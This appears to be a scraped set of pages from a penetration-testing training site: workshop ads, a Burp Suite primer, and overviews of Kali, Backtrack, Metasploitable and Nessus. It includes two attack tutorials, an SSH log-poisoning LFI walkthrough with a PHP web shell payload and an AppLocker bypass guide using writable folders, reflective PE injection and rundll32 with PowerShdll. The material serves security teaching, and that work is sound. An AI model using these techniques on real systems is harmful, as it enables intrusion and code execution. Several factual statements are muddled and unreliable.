Advanced Burp Suite


Burp Suite is one of the most popular web application security testing tools. It has a ton of features and can do everything from intercepting and modifying HTTP requests/responses in real time, to scanning web applications for vulnerabilities, to brute forcing login forms, to testing the entropy of session tokens, and it even allows you to increase its functionality by writing plugins for it.

As awesome as the tool is – surprisingly few people are really comfortable with it. I decided to put together a 2-day workshop on the advanced features of the tool.

This workshop picks up where the original Burp Suite ( course left off. It assumes the student has strong familiarity with web application security fundamentals, the OWASP top 10, basic application testing with Burp Suite.

This workshop will cover:
– Integrating Burp and SoapUI for webservices testing
– Integrating SQLMap, and w3af
– Developing your own plugins (Note: you’ll need Eclipse for this)



To answer a few questions I’ve received:

  • Yes it will be recorded for those of you that can’t attend
  • True, it will be a live/interactive workshop so you can ask me questions during the event.
  • Yes you get the virtual machines as soon as you signup for the event


Class Date and Time

  • Mon, Dec 4, 2017 7:00 PM – 9:00 PM EST

  • Wed, Dec 6, 2017 7:00 PM – 9:00 PM EST



Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.


What is BurpSuite?

Burp Suite

When it comes to the field of securing web applications, BurpSuite arises shiningly. PortSwigger Security is the responsible company of producing BurpSuite developed in Java programming language. In fact, there are two versions of this important security tool:

  1. A free version which is up for any free downloads online. It is named as the Free Edition.
  2. And there is the other version which is of course not free and referred to as the Professional Edition. It is usually purchased after having a period of the free trial.

The purpose of BurpSuite was to have a complete web application solution for the entire checking and solution process related to the web application. One of the most interesting issues about BurpSuite is that a mobile application was developed having the same tools as the desktop versions to be utilized on new IOS versions.

What are the tools that BurpSuite offers?

Burp Suite

Let’s now have a look at the tools which BurpSuite provides its users with. Actually, there are several tools offered by Burp Suite. They facilitate the penetration testing to establish the security of a web application.

  1. It could work as an HTTP proxy: A web proxy server is offered by BurpSuite, This is in order to get the man-in-the-middle attack performed between a client using his/her own browser and a web server at the other end of the connection. Following this, any raw traffic running between the two ends could then be simply inspected and modified afterward.
  2. It offers a great Scanner. A scanner which scans for the web application’s vulnerabilities is also offered by BurpSuite. It has the capability to make such scans automated for finding such vulnerabilities. This is considered as a very important aspect regarding web application’s penetration testing and security.
  3. Intruder – The importance of such a tool lies in the fact that it has the ability to launch attacks on a vulnerable web application. There are in fact several methods to perform such attacks through the Intruder tool. They include SQL Injections, Cross Site Scripting, parameter manipulation and vulnerabilities susceptible brute-force attacks. Such tool searches for such attackable vulnerabilities and whenever detected, then the attack is up for the launching. A configurable algorithm is provided to this tool’s user in order to get HTTP requests generated then.
  4. Spider – If it is manual mapping that is to be used, such tool makes it easy and really fast for its user to map the content of an application with its functionalities. A web application can be crawled by this tool in fact.
  5. Repeater –  A user can get an application tested by such tool. To elaborate, the methodology to do such testing is that the server gets a modified request from the tool, then another request reaches the application. The results are observed thereby to understand the behavior.
  6. Decoder – Such tool is very interesting especially when it comes to encoded data. It has the ability to recognize and detect different types of formats used for the encoding purposes, depending on some exciting techniques. Encoded data can get back to its canonical format in this manner. This could happen the other way around such that raw data gets transformed into forms that are hashed and encoded.
  7. Comparer – Such tool has the ability to compare between two pieces of data and detect any differences between both of them.
  8. Extender – The interesting point about this tool is that it allows for the Burp Suite to get utilized by a third-party code or security testers afterward. This way, extensions of Burp Suite can get loaded for more security functionalities.
  9. Sequencer – Such tool helps with the process of getting the quality of randomness analyzed and measured inside a sample of data items. In this way, session tokens or other data which is to be secured and not able to get precited becomes predicted on the other hand.

Examples of such vital tokens are anti-CSRF tokens, password reset tokens, and

others. They are definitely set to never get detected and discovered.

Let’s now get started with Burp Suite

  • How to launch BurpSuite?

  1. It is important to note that the software is written in Java programming language. The extension in which such software is an extension of .jar which is, in fact, a standalone Java extension.
  2. Browse the website of and get the free edition downloaded from there.
  3. In case you are however a professional user, you should then get logged in with your credentials and get the Professional Edition downloaded now.
  4. For the jar file to work, a Java environment is required, which is at the end of the day a replacement of the necessity for any contents of such file to get unpacked.
  5. Make sure that Java is installed before beginning to use Burp Suite.
  6. Get the command prompt opened using different methods according to your operating system:

Burp Suite


  • If you are a Windows user, then the start button should be pressed on then “cmd” should be typed into the search box. Then the program should be clicked on to get open now.
  • If you happen to be a user of Mac OS X, then you should press “Applications” which is in fact inside the system dock. Now, click on “Utilities” from which “Terminal app” should be chosen.
  • However, if you are a user of Linux system, then the “Console” or the “Shell” should be chosen under the lists of applications.
  1. Inside the command prompt, you just opened, type the following command now “java –version”
  2. In case that Java is already installed on the machine which is used, then the message which is to appear is the following message: “java version “1.6.0_21”. It is important to note that the needed version of Java is at least 1.6
  3. Now, the .jar file of Burp can be clicked on in order to open the Burp file directly. However, launching Burp using the command line grants whoever doing so with the privilege of much controls and several utilities upon execution. Such controls are for example like specifying how much memory should be dedicated for the sake of running Burp Suite on the machine.
  4. Let’s try the following command for instance:
java -jar -Xmx1024m /path/to/burp.jar

This command will accordingly specify an amount of 1024 Mbs for Burp while the Burp file is located in /path/to/burp.jar

  1. Now, a splash screen should get displayed at the moment to indicate that it works perfectly.

Let’s get to select a project

There are actually three categories to choose between when it comes to opening a project or creating a new one:

  1. Temporary Project: If there is no necessity to get the data saved and used afterward, then this category works the best. All data is however saved on the volatile memory.
  2. New Project on Desk: For this option, a Burp project fie is required. A new project is created consequently and a name should be given to such a project.
  3. Open existing project:

This simply allows for opening an existing project. However, the tools of Spider and

Scanners are by default paused at such moment.


Burp Suite Workshop

Burp Suite is one of the most popular web application security testing tools. It has a ton of features and can do everything from intercepting and modifying HTTP requests/responses in real time, to scanning web applications for vulnerabilities, to brute forcing login forms, to testing the entropy of session tokens, and it even allows you to increase its functionality by writing plugins for it.

As awesome as the tool is – surprisingly few people are really comfortable with it. I decided to put together a workshop on Burp Suite.

Web App Pentesting
Web App Pentesting

The first day of the workshop I will be covering the core features of the tool (Proxy, Spider, Intruder, Repeater, Sequencer, Decoder, and Comparer), and common ways to use the tool.

The second day of the workshop I’ll be covering the more advanced features – integrating Burp with other tools, and writing your own plugins.


Web App Security Testing & Burp Suite Fundamentals

Manual Web App Security Testing Fundamentals
Understanding how to use Burp Suite to perform a web app test
Integrating Burp with SQLMap

Integrating Burp Suite with other tools and writing your own plugins 

Using Burp to mask Nikto headers
Running w3af plugins through Burp
Integrating Burp with SoapUI
Burp Suite Automation


To answer a few questions I’ve received:

  • Yes it will be recorded for those of you that can’t attend
  • True, it will be a live/interactive workshop so you can ask me questions during the event.
  • Yes you get the virtual machines as soon as you signup for the event


Class Date and Time

Next Date to be announced soon.


Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.



The cost for this workshop is $200 online.

$200.00Select options



Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:


NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

Burp Suite

How to perform SSH Log Poisoning through LFI to exploit a web server?

It is important to get to know a great method to exploit a web server which essentially suffers from local file inclusion (LFI). Let’s assume we are working on a Metasploitable 2 target and the operating system to run the attack is Kali Linux.


The following steps explain how one can perform this process on Kali Linux:

  1. Open the Kali Linux terminal.
  2. Connect the target through using SSH service. The following command can be in a great use then
    ssh [email protected]
  3. Check the permission of auth.log file beforehand using the following command
    ls -l /var/log/auth.log
  4. Most of the time the auth.log file appears to have the read-write permission. They should appear like the following:
    -rw-r—r—r—syslog adm …...
  5. We can now have access to the file and read all read all its logs through the following command:
    tail -f /var/log/auth.log
  6. We can walk through the logs and check the specific logs of the user named “mfsadmin”.
  7. Now, let’s attempt to connect to the web server using a counterfeit username. One can use the following command for an invalid login
    ssh [email protected]
  8. The permission should now be denied and shown clearly as follows
    "Permission denied, please try again."


  9. Then, get back to the auth.log file and ensure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of
    "Failed Password for invalid user hacker from port 56566 ssh2"
  10. This means that a login whether a passed one or an invalid one, it will get recorded and shown inside the logs. Then, let’s now try passing a PHP code as an invalid user and see how the reaction of such deed will be. The following command provides a PHP invalid user login attempt.
    ssh ‘<?php system($_GET[‘c’]); ?>’@
  11. Then, get back again to the auth.log file and make sure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of
    "Failed Password for invalid user  <?php system($_GET[‘c’]); ?> from port 49642 ssh2
  12. Let’s assume that you have previously created LFI and now we try to browse to it using the following link:
  13. An error will appear looking like local file inclusion vulnerability.
  14. The auth.log file should get included as a parameter now through the following URL inside the browser:
  15. Note that a warning will display, with the following text:
    Warning cannot execute a blank command
  16. Let’s discuss what this actually means. The PHP code which previously contained the CMD comment has already been injected. Any command can then get sent as a parameter now.
  17. Let’s now browse into

    this will dump the data of auth.log besides executing a comment given through cmd

  18. Let’s now browse into
     " file=/var/log/auth.log&c=pwd". 

    This way, the results can display inside the window.

What is Kali Linux? 

One of the most important security tools to understand and work on very well is, in fact, Kali Linux. But let’s discuss its benefits in a nutshell.


⦁ Penetration testing and digital forensics always consider such tool as an essential one for their purposes.
⦁ It provides its user with a variety of tools and functions which fall into thirteen categories:
⦁ Information Gathering such as Dmitry
⦁ Vulnerability Analysis like Inguma
⦁ Tools for exploitation as Metasploit Framework
⦁ Wireless Attacks like WIFI Honey
⦁ Forensics such as Binwalk
⦁ Web Applications like Skipfish
⦁ Stress testing like FunkLoad
⦁ Sniffing and Spoofing as Wireshark
⦁ Password attacks like done by TrueCrack
⦁ Maintaining Access such as Intersect
⦁ Hardware hacking performed by dex2jar for instance
⦁ Reverse Engineering that can for instance use Apktool
⦁ Reporting tools as MagicTree

What is Metasploitable?


Basically, Metasploitable is a vulnerable machine which is intended to be used for the sake of purposes such as being trained, test an exploit or even general target practice. The unique aspect about Metasploit is that it has the capability to check vulnerabilities on the layer of the operating system and network services, not merely the applications layer.

Metasploitable 2 is like a good bag which contains a bunch of security tools such as Metasploit. A production environment usually has Metasploit 2 to help them with the process of examining and practicing the exploits of vulnerabilities.

Metasploitable 3 is even a newer version of Metasploitable. It is a virtual machine essentially built from the ground up with a lot of security vulnerabilities.  Through such version, Metasploit is the security tool utilized to test exploits. The BSD-style license is the one under which Metasploitable3 got released originally.

The following are requirements to run Metasploitable:

  1. An operating system which is capable of running all of the required applications listed below.
  2. VT-x/AMD-V Supported Processor recommended
  3. 65 GB Available space on drive
  4. 4.5 GB RAM

So we have mentioned that Metasploitable basically uses Metasploit in the first place. Let’s talk in the last few lines about Metasploit in fact.


The Metasploit Project is a computer security project that shows the vulnerabilities and aids in Penetration Testing. Penetration testing refers to an authorized simulated attack on computer system. It looks for security weaknesses, and Instruction Detection System (IDS) signature, which on the other hand monitors a network or systems for malicious activities. The most related sub-project is the famous open source Metasploit Framework, which is the most common exploit development framework in the world. I will elaborate on this framework idea later on in this article.

Finally, one could use Metasploit to perform some legitimate and unauthorized accesses and activities on computer systems. In this regard, it is no different from any other commercial similar products such as Immunity’s Canvas or Core Security Technologies. Metasploit, however, is commonly applicable in breaking into remote systems or test for a computer system vulnerability.


Capture The Flag (CTF) competition

We will be running Capture The Flag (CTF) competitions a few times this year. Here are the particulars:


Location of game: Online

Game Type: Team Network/Web Application/Programming Attack competition

Game Play: Scoring via placing a team file (flag) in the target servers’ root (/root or c:\ directory)

Skill Level: Beginner/Intermediate

Number of players per team: Teams can be up to 15 players


This type of game is very well suited to college infosec groups, CCDC players, security enthusiasts, blue teams, pentest teams, and red teams. It’s a pure attack game. There is no defense necessary, nor system administration tasks to do. You connect to the VPN and have fun attacking the targets in the network and scoring points.



CTF Prep Class September 9th from 10 am – 4 pm EST CTF prep class
CTF Prep Class September 16th from 10 am – 4 pm EST CTF prep class

The CTF Prep students will have access to the target lab network from September 8th – 22nd.

The actual CTF event will be on September 23rd from 12 noon to 8 pm EST.


CTF Prep class cost is: $100
CTF Competition is: $50 per participant

Note: CTF Prep class participants acquire automatic registration for the CTF Competition

Signup now and let’s have some fun

Capture The Flag (CTF) Competition

$50.00Select options



Game Basics:

This will be a fun game. Each teams’ members will be given VPN access to the InfoSec Addicts target lab/CTF environment. Each team will be given a gpg encrypted file that will serve as the team’s flag. That flag file must be copied to the appropriate directory on the victim server to count as that server being compromised and to have points awarded to that team.


Game Rules:

– One can use Nessus and Metasploit, but beware bandwidth of penalties, so keep scanning to a minimum.
– Password brute-forcing is acceptable
– Using commercial pentesting tools is acceptable (ex: Core, Saint, Canvas)
– Scoring server will verify that target host has been successfully exploited
– Man-in-the-middle attacks of any kind are NOT acceptable
– Attacking other teams is NOT acceptable


Game Requirements:

Stable internet connection with a minimum of 1Mbit/sec that can connect to UDP 1194 (OpenVPN port)

No commercial VPN licenses required to participate


Game Prizes

1st Place – 3 FREE InfoSec Addicts classes per team participant
2nd Place – 2 FREE InfoSec Addicts classes per team participant
3rd Place – 1 FREE InfoSec Addicts classes per team participant

Signup now and let’s have some fun

Capture The Flag (CTF) Prep Class

$100.00Select options



Background to Backtrack

You must have come across with the word Backtrack when it comes to hacking on Linux operating system. If you have never heard the word and further worked on its similar nowadays, then trust me you are missing a lot. But why do you think I am taking this so seriously?

The answer basically lies in two fancy and interesting notions: Digital Forensics and Penetration Testing. In case you do not know much about these two, I will explain them in a nutshell right over here. Digital forensics is the field of forensics science that specializes in the digital and investigation of material found in digital devices such as computer and mobile devices. On the other side, penetration testing is a simulation of an actual attack on the system to scan for its vulnerabilities, exploit them, and thereby gain access to all the data and features of this certain system.

Now, I can tell you the reason why you might not have heard of it. You didn’t start hacking until it was 2013 when the release of Kali Linux occurred as a rebuilt version of Backtrack. It was the Offensive Security team who were responsible for such a turning point action. At that time, it was rebuilt around the Debian distribution while it was originally based on the Knopper distribution. Both Knopper and Debian are Unix-like operating system distributions, yet each of them has their own unique features.

One good thing about it is the wide variety of users its development team was aiming to serve. As opposed to several other security software tools, it makes it very simple for beginner penetration testers to get much more closely into the field and gain more experience. Moreover, it’s community was a composition of individuals coming from diverse backgrounds. Skilled penetration testers, government entities, those who were motivated to learn and add in the field of information technology in general and computer security in particular, and those who were still new to the field were all covered under the umbrella of Backtrack and its community.


A good way to analyze a hacking platform is to first get in touch briefly with its history hoping to understand the background of its founders and their purposes behind this security tool. The story begins when WHAX and Auditor Security Collection both merged together after years of a severely competitive environment between both of them. They were both targeted for penetration testing purposes, resulting in a very effective tool in the same field name Backtrack when merged together.

WHAX was basically based on Slax distribution of Linux operating system for which Mati Aharoni was well known for at this time –He is now famous for creating Backtrack and Kali Linux as well of course–. Whoppix, the preceding version of WHAX, on the other hand, was based on Knoppix, which was referred to before in the article.

Alright, we now knew what WHAX was, what was Auditor Security Collection then? Well, its organizer Max Moser designed it to include more than three hundred tools in a user-friendly manner to assist in the penetration testing. It was, in fact, a live CD and it worked for Knoppix.

It transited through eleven main stages/releases until its last release. Each release lost all support from Backtrack Development team. Now there is no support for any versions since Kali Linux was its replacement.Backtrack

  1. Backtrack v.1.0 Beta was released in February 2006.
  2. In March of the same year. Backtrack v1.0 was first released
  3. The release of Backtrack v.2.0 occurred in 2007
  4. Backtrack v.3.0 then got released in 2008
  5. January 2010 then witnessed Backtrack v.4.0 final release
  6. Backtrack 4 R1 was released in May 2010
  7. In November 2010, Backtrack 4 R2 had its release
  8. May 2011 ushered the release of Backtrack 5
  9. August 2011 witnessed Backtrack 5 R1 released
  10. Backtrack 5 R2 had then its release in March 2012
  11. The release of the final version of Backtrack 5 R3 happened in August 2012.

What tools does Backtrack allow?

In order for us to see how effective and comprehensive Backtrack really is, we have to remind ourselves of the security tools combined ad supported By it. Before we go down explaining such tools, always remember a very important feature which grants it a great privilege over its companions if there is already any.

Backtrack allows installation from portable media such as CDs and USB flash disks, from which they are run life on a device. Similarly, Backtrack allows and supports installation on hard disks. Simply, one installs and boots it from a Live DVD or thumb-drive.

Now, it is time to expose ourselves to a great list of highly used security tools that Backtrack supports.

  • Metasploit which is a computer security project that shows the vulnerabilities and aids in Penetration Testing. Go and check the article titled “What is Metasploit” on
  • Armitage which is the Metasploit’s graphical display tool, showing vulnerabilities in a clear manner and recommending actions and exploits as well.
  • The Windows log-in password cracker called Ophcrack
  • Hydra, which is another password cracking tool.
  • A famous network detector and packet sniffer called Kismet
  • A de-facto network packet sniffer and analyzer Wireshark.
  • Cisco OCS Mass Scanner, which is responsible for performing fast scanners, testing default telnet and enabling the passwords on routers of type Cisco.
  • Aircrack-ng, the magical WIFI network sniffer, and cracker
  • Another WIFI cracker named Gerix
  • All WIFI drivers which allow for monitor mode and packet injection meant to describe an interference with an already established network.
  • The incredible Nmap network scanner to get the hosts and services and create a map of the entire network
  • Browser Exploitation Framework (BeEF)
  • Several exploits are included and commonplace software like web browsers are also included.             Backtrack

To be honest, it is almost impossible to mention every single included tool and type it over here; it will get silly this way with no real benefit. Nonetheless, another means to display the other tools would be through elaborating on the categories into which they were divided for Backtrack. In fact, there were twelve categories turning into thirteen in the latest “Kali” version. While here I will refer to the thirteen of Kali, I will refer to the twelve later on in this article for the sake of comparability.

  1. Information Gathering such as DMitry
  2. Vulnerability Analysis like Inguma
  3. Tools for exploitation as Metasploit Framework
  4. Wireless Attacks like WIFI Honey
  5. Forensics such as Binwalk
  6. Web Applications like Skipfish
  7. Stress testing like FunkLoad
  8. Sniffing and Spoofing as Wireshark
  9. Password attacks like done by TrueCrack
  10. Maintaining Access such as Intersect
  11. Hardware hacking performed by dex2jar for instance
  12. Reverse Engineering for which we can use Apktool, for instance.
  13. Reporting tools as MagicTree

Getting Started with Backtrack

In this section, I will walk through the main features of it with screenshots attached for more illustrations. Although all of these screenshots are of the latest version Backtrack 5 R3, I prefer that if you do have the chance, use Kali Linux instead. My reason is that there is no support for it anymore.

  • The Backtrack Menu          Backtrack
  • Leave Menu                  Backtrack
  • Utilities Menu        Backtrack
  • The System Menu: it displays applications essential for a hackerBacktrack
  • The Internet MenuBacktrack
  • BackTrack: here I am mentioning the twelve categories as per the latest release of Backtrack


  1. Information Gathering
  2. Vulnerability Management
  3. Exploitation tools
  4. Privilege Escalation
  5. Maintaining Access
  6. Reverse Engineering
  7. RFID Tools
  8. Stress Testing
  9. Forensics
  10. Reporting Tools
  11. Services
  12. Miscellaneous
  • Exploitation Toolsbacktrack




What is Nessus?

Nessus is a renown software from Tenable Network Security. It specifies in monitoring and scanning for security vulnerabilities. The initial release of this software was free to use for non-enterprise clients. According to, it ranked the first vulnerability scanner and the most common among its counterparts in years of 2000, 2003, and 2006.



There are four main types of Nessus software. There is Nessus Cloud which represents a Software as a Service (SaaS) platform. Another type is Nessus Manager, which serves as a physical or virtual vulnerability manager. Nessus Professional is a version that could run a device such as a laptop device or a Personal Computer (PC). Finally, the free type of Nessus is its Home which is for home-user customers.

Historical Overview


In 1998, Renaud Deraison aimed to create a free remote security scanner and publish it online, making it available for all people around the world. Back then, the project was an open source project. This was until the year 2005 when it turned to a closed source owned by Tenable Network Security, cofounded by Deraison.

In 2005, Tenable Network Security established that more that seventy-five thousand organizations around the world used it. At that time, it was Nessus 3 which existed, and until the moment its engine is free to use, but it costs $100/month per scanner. Nessus 3 supports Microsoft Windows, Unix, Linux, and some other operating systems.

However, before Nessus 3 existed Nessus 2 which required an agent to operate its functions on several operating systems. There is no need to mention how slow it was to use it back then. Nessus 2 operated under the General Public License (GPL), paving the way for developing similar projects like OpenVAS and Porz-Wahn, which are both open source projects. Despite this fact, there was an implementation of many updates on this version of Nessus by Tenable Network Security even after Nessus 3 came to existence.

In 2008, status got better to some extent from the original company’s and users’ perspectives. when a free version for home users became available to plugin feeds. Meanwhile, enterprises had –and still have—to pay for using the software for commercial purposes.

In 2009, Tenable Network Security released Nessus 4. It would later release Nessus 5 in 2012 and later the newest version, Nessus 6, in 2014.

What does Nessus do?


Let’s now discover what features it has, and to what extent such software could be beneficial for security purposes. First of all, let me begin with some services that Nessus 3 and its descendants are able to provide their holders with.

  • It automaticity scans for vulnerabilities and analyzes them in order to prioritize recommended remediation.
  • Every-day plug-ins are fed to customers’ computers to update them with any new emerging vulnerabilities –being revealed in public– that could be detected subsequently.
  • Supports Supervisory Control and Data Acquisition (SCADA) audits.
  • Supports audit on Embedded Devices
  • It offers mobile device scanning.
  • A web application and a cloud environment are also available for harnessing by it.
  • It could search for any sensitive data such as social security numbers, credit card details, and much other confidential information.
  • Nessus 3 offers a means of technical support for an organization
  • It can audit Anti-Virus configurations.
  • It can audit Federal Desktop Core Configuration (FDCC) standards
  • Nessus 3 supports the audit of The Payment Card Industry Data Security Standards (PCI-DSS) as well.

Now, why don’t we break down the types of vulnerabilities detectable when scanning through it?

  1. Vulnerabilities related to passwords such
    • System accounts having no passwords
    • System accounts having default passwords or those consisting of those passwords provided on initial setup or after reset
  2. Vulnerabilities with which remote exploitations could grant access to sensitive data
  3. Misconfiguration vulnerabilities such as missing software patches, or open mail relay
  4. Vulnerabilities related to Denial of Service attack of TCP/IP stack via sending some mangled packets through the network
  5. Arrangements for conducting PCI DSS audits

Is Nessus actually necessary?

The answer to this question is logically deductible after summarizing its unique capabilities. These abilities could help determine the reasons for choosing it.

  • Some endpoint agents could be configured on a device:
    • They allow for offline scans and report results to Nessus Cloud and Nessus Manage administrators whenever an internet connection gets established.
    • They have also the ability to scan devices for malware.
  • Upon buying Nessus professional for a particular organization, or even hosting on Nessus Cloud and Nessus Manager, technical support for any issue related to it is always available.
  • On-demand – and completely free– training are offered either physically in specified centers of Tenable Network Security, virtually, or even on-site where the customer is based.
  • Nessus console has an enhanced user-friendly Graphical User Interface (GUI).
    • One can apply Security policies by a bunch of clicks and checks.
    • Email notifications could be targeted by administrators of an organization for scan results and recommended remediation to apply.
    • Preconfigured reports or customized ones could be run as a host by administrators.
  • It utilizes the Representational State Transfer Application Program Interface (RESTful API) to easily integrate into any organization.
  • CyberArk is supported to be integrated with by both Nessus Cloud and Nessus Manager for the sake of credential management, with various patch management systems. To illustrate some of the companies providing the entitled Systems:
    • For computer systems: Microsoft, Dell, IBM, and Redhat.
    • For mobile systems: Apple, Microsoft, AirWatch, and MobileIron.

Given all of these premises and depending on several business practices, my answer to the initial question is definitely yes. All of the aforementioned characteristics distinguish it from all of its other software counterparts. Some other scanners may have one of these characteristics, yet it is almost impossible so far to find something containing all of such powers.

How to use Nessus for Penetration testing?

Nessus is not actually a penetration testing tool. However, its scanning results –when combined with all penetration testing tools—could be an indicator of the security risk of a computer system. Testing tools which could be for example utilized in this regard are Immunity CANVAS, Core IMPACT, and definitely Metasploit. In addition, in the case of any password-related vulnerability, it has the power to use the password cracking tool named Hydra to get the password and get access afterward.

One, for instance, could harness the tools of Nessus Home to the maximum to help with penetration testing. Nessus Home is a free version as mentioned before.


  1. Download it and install it.
  2. Set Up Nessus Account and Activate the installed copy through the activation codeNessus
  3. Start a Vulnerability ScanNessus
  4. Understand the results: In case we choose Basic Network Scan, check through each given device Internet Protocol (IP) address and understand from where the vulnerabilities are actually originated from.NessusNessusNessus
  5. Discover how to exploit such devices. Though it doesn’t have a specialty in this matter, it will show you where to go.Nessus


How to Bypass a Windows AppLocker?

Quick Background on AppLocker

First, we need to get an insight into what an Applocker is and its mechanism before going through the technical details.

AppLocker is basically a software from Microsoft that grants some users specific privileges while preventing other users from the same privileges. In other words, some users have the freedom to open some particular applications on the operating system whereas some others don’t have the rights to open these applications. For instance, one user could freely run Internet Explorer, and another cannot even open it. Most sensitive machines such as Automated Teller Machines (ATM) and computers inside important organizations all use AppLocker

AppLocker essentially covers five main categories of files:

  • Executable files coming in .exe and .com extensions such as ipconfig.exe
  • Installer files which are utilized by Windows to get any new software installed on the computer or the machine; such files come in .msi, .msp, and .mst extensions
  • Script files which come in .ps1, .vbs, .vba, and .cmd and .js extensions
  • Packaged Apps which one installs through Microsoft Store
  • DLL files which come in .dll and .ocx extensions

Throughout this article, the main focus is in the common file formats used when talking about security restrictions and privileges using AppLocker. Therefore, I will mostly maintain executable files, installers, and script files.

How to activate AppLocker on your machine

  1. Open Administrative Tool -> Services
  2. Get through the Group Policy Editor which differs between one domain controller (gpmc.msc) and on (gpedit.msc) on local machines
  3. If the last steps did not work, type “Edit group policy” inside the search text box inside the menu bar.
  4. Under “Security Settings” open “Application Control Policies”Windows AppLocker
  5. Press “Configure Rule Enforcement” in order to choose among the five aforementioned application categories, and apply an appropriate filtering accordingly.
  6. Three main points should now determine the rules which should govern the usage of each of those categories:

a. Execution Path:

By default, all executable files and scripts which reside inside the following two directories “C:\Windows” and “C:\Program Files” are allowed. If this was not the case for such files in these locations, the system would not boot in the first place.

b. Information about the Publisher:

Sometimes AppLocker relies on the vendor’s public key to sign a specific executable file as binary files. Based on this, AppLocker may decide to get such file allowed or denied.–Windows AppLocker

c. File Hash:

AppLocker stores Message Digest 5(MD5) hashes of executable files, and therefore depends on them to decide whether to allow a certain file or not. Although this aspect requires a great deal of memory usage, it is essential for AppLocker in order to prevent any hazardous executable file from running.

Consider a Standard Setup

When the user doesn’t change any of the default rules over the files, we are left with all the executable files (other than those located at “C:\Windows” and “C:\Program Files”) without the ability of running them anywhere on the machine. This is a problem because for instance, we cannot run Meterpreter.exe.

There is, in fact, a way out of this problem. Think about this way; executable files aren’t allowed to run at several locations inside the machine while other locations don’t prevent running the same executable files. If these latter locations could become known by you, you as a standard user with no admin privileges will enjoy running any desired executable files inside the machine; it seems straightforward, right? Well, it is actually a tedious work to go through each location and investigate it manually to see the applied rules on it. What is the solution then?

Basically, PowerShell script is an appropriate method to automatically identify where it is accessible to write –to run our executable file— This basic installation will let “C:\Windows\Tasks” and “C:\Windows\tracing” writable by everyone.

  • In order to make the PowerShell show us these files, “Get-Content” and “Invoke-Expression” commands are to be used.Windows AppLocker

  • Once we get to know these files are writable, copy the desired executable file “mimikatz.exe” or “meterpreter.exe” or whatever executable file you want to run on the machine.
  • Run the desired executable file now. Note that the reason for having an executable file lies in it simplicity having a certain malware or a custom tool for example. However, it does not require an executable file for an attack; this could be done simply using Invoke-Expression through which we bypass any execution path restriction.Windows AppLockerWindows AppLocker

Now, consider this case instead. You have searched for writable directories, and weren’t able to find any. How would you react then? If we could store the executable file that we want somewhere in the memory and then jump to its address/location without the need for any directories, then, we would solve the problem.

  • Use a PowerShell variable to store the executable fileWindows AppLocker
  • Make use of PowerSploit framework by using its function called Invoke-ReflectivePEInjection. It will load this file into a memory location to which you should jump in order to run the file.Windows AppLocker

Consider a more advanced Setup

What if the user was aware of the vulnerabilities of the default rules? He rather restricted the usage of cmd.exe and PowerShell.exe to get ascertained that all the previous steps which rely on these applications could never be used.Windows AppLocker

  • Look for something forgotten by the user to be blocked
  • In this case, the user took care of all the Windows-64 tools and applied what rules he wished for on them. Still, he overlooked Windows-32 tools, which would be the way to go instead. Simply use the “C:\Windows\SysWOW64\” location to open the PowerShell from where we could manipulate and play around with our executable file as mentioned before.Windows AppLocker
  • Even if we merely search for “PowerShell.exe”, we will find several versions of PowerShell each having its unique hash. There would be still a plenty of PowerShells having hashes other than the blocked one.Windows AppLocker
  • If all of the above-shown instances of PowerShell are blocked along with cmd.exe, there is still a way out.
  • Use “C:\Windows\System32\wbem\wmic.exe”. This utility could make us very close to know information about the system. It will not be that easy of course as it was on the PowerShell; nevertheless, it still provides us with an alternative.Windows AppLocker

Consider a more advanced Setup

The user could be capable enough to block all of the previous methods. Even WMIC cannot run in this case. There is always a way out!

  • Note the files of type DLL which are not blocked
  • Search for a DLL implementation of PowerShell online
  • Download it into any folder
  • Run the file using the utility of “C:\windows\system32\rundll32.exe”
  • To execute it: type the DLL and its entry point function. In our case, type “rundll32.exe PowerShdll.dll,main”Windows AppLocker



Finally, check out my other article on Transferring files from Linux to Windows (after exploit).

Web App Pentesting Night School

The primary focus of the class is transitioning from Network to Web App Pentesting

  • Differences and similarities
  • Learning the popular technologies and platforms in use today

Manually Identifying & Exploiting Vulnerabilities

  • SQL Injection
  • Cross Site Scripting
  • Remote/Local File Includes

Differences in how vulnerabilities are exploited on each platform

  • JSP/Oracle

Your Web App First Pentest

Web App Pentesting

Web Application Penetration Testing

Lab Network Access

Strategic Security now has a penetration tester’s target practice lab environment. Targets in the lab network will change on the 1st of every month. Students have the option to purchase 1 or 1 months access to the lab environment.

Students will receive

  • 6 hours of CPEs
  • Several virtual machines
  • Courseware slides
  • Lab manual
  • Lab access


Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time, or even a whole day.


Each student will be given access to a InfoSec Addicts Group for the class. This will be where students can ask questions outside of the normal class hours, work with other students on lab exercises, homework, and challenges.

A Strategic Security class mentor will be assigned to the InfoSec Addicts Group to answer questions (allow 1 day for responses).

A Customer Relationship manager will be assigned to the class to manage questions, and support issues.



This class will be live online from 16th and 18th of January 2018 from 7pm EST to 9pm EST for each scheduled day.


Class Cost

The class cost is $200

Fill out this form to sign up for the class.

$200.00Select options



Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:


NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

Pentester Candidate Program – March 2018

Pentester Candidate Program March 2018

On the 24th  of February 2018, InfoSec Addicts will launch the Pentester Candidate Program. This program is designed to satisfy the basic requirements of a penetration tester. The program will cover the most common technical and soft skill requirements. Top candidates will later receive job interviews for a remote penetrating testing job. This is through partnership with several penetration testing firms

Top candidates may receive interview opportunities for a cleared penetration testing position. This is more so for those with a US Security Clearance and who live in either the DC, Maryland or Virginia areas.

This is the real chance more so for those who REALLY want to become pentesters. It is the perfect combination of hands-on training, mentorship, and a real job opportunity.

Pentester opportunity just ahead

What is covered in the pentester program?

